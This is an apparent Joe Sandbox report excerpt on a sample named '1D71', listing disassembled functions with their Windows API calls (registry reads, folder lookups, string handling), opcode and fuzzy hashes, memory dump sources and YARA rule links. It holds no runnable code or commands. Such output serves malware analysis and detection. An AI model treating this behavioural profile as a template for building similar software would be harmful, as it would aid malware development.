Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: ??2@Exception@8Throwstd::exception::exception
String ID: Pv@$x@
API String ID: 3448701045-2507878009
Opcode ID: 980d6eea7b664cab60e6d86db1e8d11ee68504ae67a5a5b0083e142dd03a954a
Instruction ID: d532d441e19495b57cb34d138c3e0c88a0b377879b543fee6e4065129139ec29
Opcode Fuzzy Hash: 980d6eea7b664cab60e6d86db1e8d11ee68504ae67a5a5b0083e142dd03a954a
Instruction Fuzzy Hash: 37F027B160020997EB18E7E08D027BF7374AF00304F04847EA911E2340FB7CD605819A

Function 00408D80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(?,00408C9B,00000000,?,?,00000000), ref: 00408D92
std::exception::exception.LIBCMT ref: 00408DAD
__CxxThrowException@8.LIBCMT ref: 00408DC2

Strings

PC, xrefs: 00408DB7, 00408DA3, 00408DBA
Pv@, xrefs: 00408DBB

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: ??2@Exception@8Throwstd::exception::exception
String ID: Pv@$PC
API String ID: 3448701045-1362088297
Opcode ID: b42475b819e5296bc50c64d31f11e30ed0ca5ba6e695ecad0727ff97edcd75c6
Instruction ID: c1c2e9470fcfd07362e0a09b01d9ac21ad58a2ed8b2a4eb6edd2c0a09cf1513b
Opcode Fuzzy Hash: b42475b819e5296bc50c64d31f11e30ed0ca5ba6e695ecad0727ff97edcd75c6
Instruction Fuzzy Hash: 9AE02B7050030A97CB18F7B59D016BF73789F10304F40476FE965A22C1EF798504859D

Function 02478FE7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(?,02478F02,00000000,?,?,00000000), ref: 02478FF9
std::exception::exception.LIBCMT ref: 02479014
__CxxThrowException@8.LIBCMT ref: 02479029

Strings

PC, xrefs: 02479022
PC, xrefs: 0247900A, 0247901E, 02479021

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: ??2@Exception@8Throwstd::exception::exception
String ID: PC$PC
API String ID: 3448701045-3524912142
Opcode ID: b42475b819e5296bc50c64d31f11e30ed0ca5ba6e695ecad0727ff97edcd75c6
Instruction ID: f57db25eb368c2a23d42c97431081f3ca6348c56cfbfccf1abc727a0415de353
Opcode Fuzzy Hash: b42475b819e5296bc50c64d31f11e30ed0ca5ba6e695ecad0727ff97edcd75c6
Instruction Fuzzy Hash: B4E02B7491060956CB28EBB58D046FF73789F00314F00471FD83652280EB7085048A95

Function 02487E76 Relevance: 7.9, APIs: 5, Instructions: 367stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,00638AAC), ref: 024879D7
StrCmpCA.SHLWAPI(?,00638C1C), ref: 02487AAF
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02487AE7
lstrcpy.KERNEL32(00000000,?), ref: 02487B44

Part of subcall function 024974A7: lstrcpy.KERNEL32(00000000), ref: 024974C1

Part of subcall function 02471677: lstrcpy.KERNEL32(00000000,?), ref: 0247169E
Part of subcall function 02471677: lstrcpy.KERNEL32(00000000,?), ref: 024716C0
Part of subcall function 02471677: lstrcpy.KERNEL32(00000000,?), ref: 024716E2
Part of subcall function 02471677: lstrcpy.KERNEL32(00000000,?), ref: 02471746

Part of subcall function 02485E47: lstrcpy.KERNEL32(00000000,0042D01C), ref: 02485E7C
Part of subcall function 02485E47: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 02485EAB
Part of subcall function 02485E47: lstrcpy.KERNEL32(00000000,00000000), ref: 02485EDC
Part of subcall function 02485E47: lstrcpy.KERNEL32(00000000,00000000), ref: 02485F04
Part of subcall function 02485E47: lstrcat.KERNEL32(00000000,00000000), ref: 02485F0F
Part of subcall function 02485E47: lstrcpy.KERNEL32(00000000,00000000), ref: 02485F37

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$FolderPathlstrcat
String ID:
API String ID: 2938889746-0
Opcode ID: 2bebba6af289712f080de957bcbf78d05df3d434af1be4e71e032b38b9078c2a
Instruction ID: b32de5885e60344b44178d561ce7f2a575a45b6dd77a51264430443dd18cd4aa
Opcode Fuzzy Hash: 2bebba6af289712f080de957bcbf78d05df3d434af1be4e71e032b38b9078c2a
Instruction Fuzzy Hash: 31F16075E102058FDB24EF29C454A5DBBF2AF85318F29C1AED8189B3A2D731D942CF91

Function 02487A84 Relevance: 7.9, APIs: 5, Instructions: 365stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,00638AAC), ref: 024879D7
StrCmpCA.SHLWAPI(?,00638C1C), ref: 02487AAF
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02487AE7
lstrcpy.KERNEL32(00000000,?), ref: 02487B44
StrCmpCA.SHLWAPI(?,00638D84), ref: 02487DE4

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: d89e5a93b16780a4945d7001f8fe04c944c6bc261c0c89bfee13aa78266d6684
Instruction ID: b7cd8ff0dd98c7b788b1b52a0f85caf03d3df21221c7c208bee4ce024501c246
Opcode Fuzzy Hash: d89e5a93b16780a4945d7001f8fe04c944c6bc261c0c89bfee13aa78266d6684
Instruction Fuzzy Hash: 97F16075E102058FDB24EF29C454A5DBBF2AF85314F29C1AED8189B3A2D731D942CF90

Function 02479F37 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 123memorystringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000), ref: 02479F6F
LocalAlloc.KERNEL32(00000040,?), ref: 02479FA1
StrStrA.SHLWAPI(00000000,004351E8), ref: 02479FCA
memcmp.MSVCRT(?,0042DC44,00000005), ref: 0247A003

Strings

, xrefs: 0247A02C

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: AllocLocallstrcpymemcmp
String ID:
API String ID: 4154055062-3916222277
Opcode ID: 57f8e19cb4e75aecd9d06e79b2a2f29f70109d821a836c89033672d7bb62ba8e
Instruction ID: 9410725084522395038e9ef95dcc68d4367678be9077dc21bbf09ac5b3d81942
Opcode Fuzzy Hash: 57f8e19cb4e75aecd9d06e79b2a2f29f70109d821a836c89033672d7bb62ba8e
Instruction Fuzzy Hash: D041A371A002959BCB10EFB5CC44AEF7BB6AF46304F04496AEC65A7352DB70E905CF90

Function 0249965F Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

IsValidCodePage.KERNEL32 ref: 02499697
GetCPInfo.KERNEL32(?,?), ref: 024996AA
memset.MSVCRT ref: 024996C2
setSBUpLow.LIBCMT ref: 02499798

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValidmemset
String ID:
API String ID: 703783727-0
Opcode ID: 111c3c07fb09bc6f5b37efe096d1c8aea2b28741611527557449d701e77a25d6
Instruction ID: 4f3171a194e8d742343db00a2a3dcfda1a785918b29c6430fabe85533d68f44e
Opcode Fuzzy Hash: 111c3c07fb09bc6f5b37efe096d1c8aea2b28741611527557449d701e77a25d6
Instruction Fuzzy Hash: 15310470A046818EEF258F75C88437ABFA09F02315F0849EFD891DF292CB2AC446C751

Function 00421B00 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00421E28), ref: 00421B52

Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,0042D01C), ref: 0042182F
Part of subcall function 00421800: lstrlenA.KERNEL32(009E6588,00000000,00000000,?,?,00421B61), ref: 00421840
Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,00000000), ref: 00421867
Part of subcall function 00421800: lstrcatA.KERNEL32(00000000,00000000), ref: 00421872
Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,00000000), ref: 004218A1
Part of subcall function 00421800: lstrlenA.KERNEL32(00435564,?,?,00421B61), ref: 004218B3
Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,00000000), ref: 004218D4
Part of subcall function 00421800: lstrcatA.KERNEL32(00000000,00435564,?,?,00421B61), ref: 004218E0
Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,00000000), ref: 0042190F

sscanf.NTDLL ref: 00421B7A
SystemTimeToFileTime.KERNEL32(?,?), ref: 00421B96
SystemTimeToFileTime.KERNEL32(?,?), ref: 00421BA6
ExitProcess.KERNEL32 ref: 00421BC3

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
String ID:
API String ID: 3040284667-0
Opcode ID: a2f6735c031ea2f4695345a85905500a2208e9f846abe19c5e0427cdd94a5bb9
Instruction ID: 74431add482d266e5f481d4c3f26529432deb7ac332c40e3c7ddf6828a7bb522
Opcode Fuzzy Hash: a2f6735c031ea2f4695345a85905500a2208e9f846abe19c5e0427cdd94a5bb9
Instruction Fuzzy Hash: BD2102B1508301AF8344EF69D88485BBBF9EFD8304F409A1EF5A9C3220E774E5048FA6

Function 02493337 Relevance: 7.6, APIs: 5, Instructions: 61registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 0249336D
RtlAllocateHeap.NTDLL(00000000), ref: 02493374
RegOpenKeyExA.ADVAPI32(80000002,006389D4,00000000,00020119,?), ref: 02493393
RegQueryValueExA.ADVAPI32(?,00638CEC,00000000,00000000,00000000,000000FF), ref: 024933AE
RegCloseKey.ADVAPI32(?), ref: 024933B8

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 49ee177b7729dda60db32b2962d7b5bd1a3cc4ed7fca1f7095805fab15dd51ff
Instruction ID: 354f1ef787fb4e831f0678a257d43b4e33f8629802066180dc86671d5d6e7301
Opcode Fuzzy Hash: 49ee177b7729dda60db32b2962d7b5bd1a3cc4ed7fca1f7095805fab15dd51ff
Instruction Fuzzy Hash: A0118272A44204AFD714CF94DC45FABBB7DEB48711F00411AFA05D3280DB7459048BE1

Function 00406E30 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,00000040), ref: 00406E40
memcpy.MSVCRT(?,00005A4D,000000F8), ref: 00406E7C
GetProcessHeap.KERNEL32(00000008,?), ref: 00406EB4
HeapAlloc.KERNEL32(00000000), ref: 00406EBB

Strings

@, xrefs: 00406E30

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: Heapmemcpy$AllocProcess
String ID: @
API String ID: 1643994569-2766056989
Opcode ID: 9d0aa672cad1b422e85df3b0c0ffa8adf9295387143c5de3d490c1a63fad8456
Instruction ID: b28c2e2eafd009aece7dfa75dd6d3a6e0d6a1e6899dabcaa8fc792e54f3dbcc7
Opcode Fuzzy Hash: 9d0aa672cad1b422e85df3b0c0ffa8adf9295387143c5de3d490c1a63fad8456
Instruction Fuzzy Hash: 9C1161706007129BEB258B61DC84BB773E4EB40701F454439EA47DB684FFB8D950CB99

Function 02492B17 Relevance: 7.5, APIs: 5, Instructions: 49registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 02492B2C
RtlAllocateHeap.NTDLL(00000000), ref: 02492B33
RegOpenKeyExA.ADVAPI32(80000002,00638B98,00000000,00020119,02492AB0), ref: 02492B52
RegQueryValueExA.ADVAPI32(02492AB0,0043565C,00000000,00000000,00000000,000000FF), ref: 02492B6C
RegCloseKey.ADVAPI32(02492AB0), ref: 02492B76

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 5b7eb5e49a2e4e8c4d8cd3c54b8221332289a025f50f89e1be766efa374635ab
Instruction ID: 9118c2f5687a0e463d3eaf966c11d5524cdc94f89dd9a497208157924886e21e
Opcode Fuzzy Hash: 5b7eb5e49a2e4e8c4d8cd3c54b8221332289a025f50f89e1be766efa374635ab
Instruction Fuzzy Hash: CB019A79A00318BFE714CFA09C59FEB7BADAB48755F200099FE4597241EBB059088BE0

Function 02471267 Relevance: 7.5, APIs: 5, Instructions: 37registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 0247127C
RtlAllocateHeap.NTDLL(00000000), ref: 02471283
RegOpenKeyExA.ADVAPI32(80000001,00431D24,00000000,00020119,?), ref: 024712A0
RegQueryValueExA.ADVAPI32(?,00431D18,00000000,00000000,00000000,000000FF), ref: 024712BA
RegCloseKey.ADVAPI32(?), ref: 024712C4

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: c6adfcbbf362e72c312c20df80564037ba3fc04d8fe2fd2ec6ad55297d477a0e
Instruction ID: 29463fc66a7897856d0f4d0595b6744f01c3eb5b60c67cd9ae1afc9250f9b2de
Opcode Fuzzy Hash: c6adfcbbf362e72c312c20df80564037ba3fc04d8fe2fd2ec6ad55297d477a0e
Instruction Fuzzy Hash: 05F09075A40308BFD7049BA09C4DFEB7B7DEB04755F100059BE09E2280D7B05A048BE0

Function 02499268 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 02499274

Part of subcall function 02498A96: __getptd_noexit.LIBCMT ref: 02498A99
Part of subcall function 02498A96: __amsg_exit.LIBCMT ref: 02498AA6

__getptd.LIBCMT ref: 0249928B
__amsg_exit.LIBCMT ref: 02499299
__lock.LIBCMT ref: 024992A9
__updatetlocinfoEx_nolock.LIBCMT ref: 024992BD

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 597a1c53584a699b3bced9a2b76091cfa842eeb3be3d7ba8d5d4667430613e89
Instruction ID: e37bd649f4c70c864c30a52f60c4587755973e7b5384e67761dad9860d28a359
Opcode Fuzzy Hash: 597a1c53584a699b3bced9a2b76091cfa842eeb3be3d7ba8d5d4667430613e89
Instruction Fuzzy Hash: E8F0B4729057009FDF20BBBA9C05B4E7FE1AF00724F14050FD4056B2C0DB6459409F59

Function 00423E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124stringtimeCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 00423E45
lstrcpy.KERNEL32(00000000,009E8D40), ref: 00423E6F
GetSystemTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00404D2A,?,00000014), ref: 00423E79

Strings

*M@, xrefs: 00423EEE, 00423EDD

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$SystemTime
String ID: *M@
API String ID: 684065273-4186991356
Opcode ID: b737b09e2fdb8671383c258246ff60179fc49d3e631dd6ba07feedc772b9d3db
Instruction ID: b70439790c50c5c6328432dc7e4028cf2044113f60d486d5e56dbf02b5324992
Opcode Fuzzy Hash: b737b09e2fdb8671383c258246ff60179fc49d3e631dd6ba07feedc772b9d3db
Instruction Fuzzy Hash: 76418D31E012158FDB14CF29E984666BBF5FF08315B4A80AAE845DB3A2C779DD42CF94

Function 00417CA0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00417D14
std::_Xinvalid_argument.LIBCPMT ref: 00417D2F
memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,004091B6,?,?,?,?,00000000,?,00001000,?), ref: 00417D84

Part of subcall function 00417DC0: std::_Xinvalid_argument.LIBCPMT ref: 00417DD8
Part of subcall function 00417DC0: std::_Xinvalid_argument.LIBCPMT ref: 00417DF6
Part of subcall function 00417DC0: std::_Xinvalid_argument.LIBCPMT ref: 00417E11
Part of subcall function 00417DC0: memcpy.MSVCRT(?,?,?,00000000,?,?,00417CFA,00000000,?,?,00000000,?,004091B6,?), ref: 00417E74

Strings

string too long, xrefs: 00417D0F, 00417D2A

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$memcpy
String ID: string too long
API String ID: 2304785028-2556327735
Opcode ID: d1122dada4d07791fd5e4676f97221fa03903bdfbd109d0c1a1ca64d8767a8ee
Instruction ID: cceaebfc163d96aa0f8494b9eac0357faa14b69c3768ea23588e1796d2ee1bc6
Opcode Fuzzy Hash: d1122dada4d07791fd5e4676f97221fa03903bdfbd109d0c1a1ca64d8767a8ee
Instruction Fuzzy Hash: 0F31E5723086148BD7249E6CF880ABBF7F9EF91764B204A2BF14687741D775988183ED

Function 0248F247 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0248F27A
StrCmpCA.SHLWAPI(?,ERROR), ref: 0248F295
lstrcpy.KERNEL32(00000000,ERROR), ref: 0248F2F6

Strings

ERROR, xrefs: 0248F28F, 0248F2F0

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: ERROR
API String ID: 3722407311-2861137601
Opcode ID: da32503694cbb92f39706253748ceac56d5574eca248915fa64637d0a76e0128
Instruction ID: 7fdd692efc57ebbc6c559d0db65a8c0fc26cc8d473dbb908a609bfbb5d09536f
Opcode Fuzzy Hash: da32503694cbb92f39706253748ceac56d5574eca248915fa64637d0a76e0128
Instruction Fuzzy Hash: 11213E706201969BCB24FF7ACC44ADE3BE5AF04308F00442AEC59DBA01DB75D804DB91

Function 00408740 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00408767

Part of subcall function 0042A1A3: std::exception::exception.LIBCMT ref: 0042A1B8
Part of subcall function 0042A1A3: __CxxThrowException@8.LIBCMT ref: 0042A1CD

Strings

yxxx, xrefs: 00408771
yxxx, xrefs: 00408749
vector<T> too long, xrefs: 00408762

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

